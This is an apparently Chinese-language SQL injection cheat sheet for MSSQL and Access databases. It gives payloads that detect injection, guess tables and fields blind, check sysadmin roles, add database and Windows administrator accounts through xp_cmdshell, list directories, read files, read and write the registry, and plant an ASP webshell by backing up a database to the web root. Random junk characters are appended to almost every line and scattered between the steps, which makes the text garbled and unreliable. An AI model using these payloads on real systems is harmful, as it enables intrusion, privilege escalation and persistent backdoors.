1.判断是否有注入;and 1=1 ;and 1=2 ;l'I.j
2.初步判断是否是mssql ;and user>0 @w0[5ZAj
FQyiIT6
3.注入参数是字符'and [查询条件] and ''=' \<} nn?~n
~a $%
a
4.搜索时没过滤参数的'and [查询条件] and '%25'=' BlUY9`VWh@
$$@Tgkg?o
5.判断数据库系统
Y"@k vd
;and (select count(*) from sysobjects)>0 mssql l-
l}xBf
Li2)~4p><
;and (select count(*) from msysobjects)>0 access 7@F B^[H:y
IjNm/${$
AZa3!e/1
G\Me%{b#
6.猜数据库 ;and (select Count(*) from [数据库名])>0 oC
[g
Ij+zR>P8=\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 7XNfH@
X'c5s~9
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 [3.rG!Na
?,j:Y0l.L
9.(1)猜字段的ascii值(access) 1f=L8Dr
H2]I__t/u
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ^{w&&+#,q
j!s&yHE1
(2)猜字段的ascii值(mssql) &eg,*K} '
ld
$`5!Z
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 i"'k|TGW^
6voK{C4J
10.测试权限结构(mssql)
j-
A|\:
)d(cXN-T
z,9qAts?mh
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- [V2l&ZUni
u7mj
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- )oj`K,#
[D t`@Dm
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- \o^+'4hq<5
/Hx\ gtV
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- r#XDgZtI
cZu:dwE
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- C?O{l%0
2d._X$fx7
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 7@sWT<P
$OT:J
;and 1=(select IS_MEMBER('db_owner'));-- &0#qy9wx
F JzjS;
C.@zVt
t~AesHZpk
11.添加mssql和系统的帐户
=y':VIVJC
;exec master.dbo.sp_addlogin username;-- p;@PfhEz)
;exec master.dbo.sp_password null,username,password;-- $d"6y
1kpI?Plki
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- b ,cvQD
F kWJB>
;exec master.dbo.xp_cmdshell 'net user username password \z_@.Jw{
'.iUv#j4Sh
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- +b{\v1b
"-hgeQX
;exec master.dbo.xp_cmdshell 'net user username password /add';-- dI>oHMC
f5G17: Q
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- p?}Rolk7
MB#%k#z`B
D\k);BU~
`S!`=26Z!
12.(1)遍历目录
lu >>~vy6
;create table dirs(paths varchar(100), id int) snyx$Qx(
YB 4R8}4
;insert dirs exec master.dbo.xp_dirtree 'c:\' =Xp3UNXg
qYpHH!!C=
;and (select top 1 paths from dirs)>0 TWn7&,N
GJ*AyYG
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Ad"::&&Wk
`Q{kiy
^iGIF~J9
9`b*Y*d
(2)遍历目录
.z_^_@qdm
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- k<:!^_3H
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 MM97$
-<|Ebh d3
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 LJBoS]~
4TLh'?Xu9
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 *kDXx&7B$
6Fm.^9@
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 @ O%m,
IlaH,J7n
sx/g5?zh
s#d>yx_b
13.mssql中的存储过程
[*1c.&%(
xp_regenumvalues 注册表根键, 子键
wi9fYfuv3R
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 "e_ED*
x.d9mjLN8m
xp_regread 根键, 子键, 键值名
$H_4Y-xOi
;exec xp_regread ok7DI
R+^/(Ws'<
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 BkIvoW_
yX8F^iv[
xp_regwrite 根键, 子键, 值名, 值类型, 值
']qC,;2
值类型有2种: REG_SZ 表示字符型, REG_DWORD 表示整型
6z/8nf +u
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 1z8.wdWJ}
GM@TWwG-B
xp_regdeletevalue 根键, 子键, 值名
Vv zd>yII
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 iA%3cpIc(Z
3 \kT#nr
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 n:7=z0
s
Ue8_Q8q5
A^g81s.5
S;CT:kG6Y{
14.mssql的backup创建webshell
zmuq4-.
use model dso\+s
.%*.nq
create table cmd(str image); JhuKW>7
( /uL6W d0
insert into cmd(str) values (''); 0V1kZ.
*A_
backup database model to disk='c:\l.asp'; u_mm*o~)g
~>{<r{H"S
NeNKOW#X
8_KXli}7=
15.mssql内置函数
S:DB%V3
;and (select @@version)>0 获得Windows的版本号 Wqy8ZgSC
vnIxI a
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 2wu
5`Z[E
V @8X.R>
;and (select user_name())>0 爆当前系统的连接用户 F@?QVdY1q7
}p&aI?-B
;and (select db_name())>0 得到当前连接的数据库 OD*DHC2rN]
N\H(AzMw
dLjT^ 9
}De)_E\~
16.简洁的webshell
O1/!)E!
use model %zY3,4~
&M<431y
create table cmd(str image); k"AY7vq@!P
~-.q<8
insert into cmd(str) values (''); #`?uV)(
#&DJ3(T
backup database model to disk='g:\wwwtest\l.asp';